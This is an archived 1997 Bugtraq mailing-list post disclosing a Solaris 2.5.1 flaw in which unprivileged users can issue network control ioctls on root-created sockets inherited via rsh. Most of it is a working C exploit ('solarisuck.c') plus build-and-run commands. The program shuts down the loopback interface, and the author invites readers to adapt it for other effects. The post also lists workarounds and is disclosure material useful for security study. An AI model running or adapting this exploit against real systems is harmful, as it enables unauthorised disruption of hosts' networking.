Solaris 2.5.1 party piece

Alan Cox (alan@LXORGUK.UKUU.ORG.UK)
Thu, 19 Jun 1997 15:27:39 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Martynas Buozis: "SCO Advanced File and Print Server 3.5.1f & Port 139 bug (fwd)"
Previous message: Nicolas Dubee: "(no subject)"
Next in thread: Doug Hughes: "Re: Solaris 2.5.1 party piece"

Well CERT have had this for a year, AUSCERT for a couple of weeks and
now its time bugtraq had it

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck

solarisuck.c

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
{
struct ifreq please_break_me;

strcpy( please_break_me.ifr_name, "lo0");
please_break_me.ifr_flags=0;

if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
perror("Damn it didnt work. Obviously not Solaris ;)");
}

You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.

Workarounds:
1. Disable rsh and any non root owned inetd tasks - breaks remote tar etc
2. Run an OS that the vendor doesnt take a year to fix bugs in

I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
to prove Sun have sat on this for ages.

Alan

Next message: Martynas Buozis: "SCO Advanced File and Print Server 3.5.1f & Port 139 bug (fwd)"
Previous message: Nicolas Dubee: "(no subject)"
Next in thread: Doug Hughes: "Re: Solaris 2.5.1 party piece"